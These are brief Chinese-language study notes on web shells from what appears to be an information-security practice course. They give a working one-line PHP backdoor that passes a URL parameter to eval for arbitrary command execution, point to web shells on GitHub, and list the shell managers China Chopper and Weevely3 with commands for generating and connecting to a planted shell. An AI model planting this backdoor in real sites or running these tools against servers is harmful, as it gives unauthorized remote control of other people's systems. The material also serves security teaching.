信息系统安全与对抗实践笔记
- 一句话木马
只需要一句代码就可以实现任意命令执行的木马
php jsp asp
<?php
eval($_GET['a']); //将字符串当作语句来执行,参数即为命令
?>
-
小马&大马
可以在github上找到
项目链接 -
木马工具介绍
中国菜刀(PHP7不适用)
C刀-php7版本
Weevely3(Linux版菜刀)
weevely generate <password> <path>生成代码
weevely<URL><password>[cmd]连接木马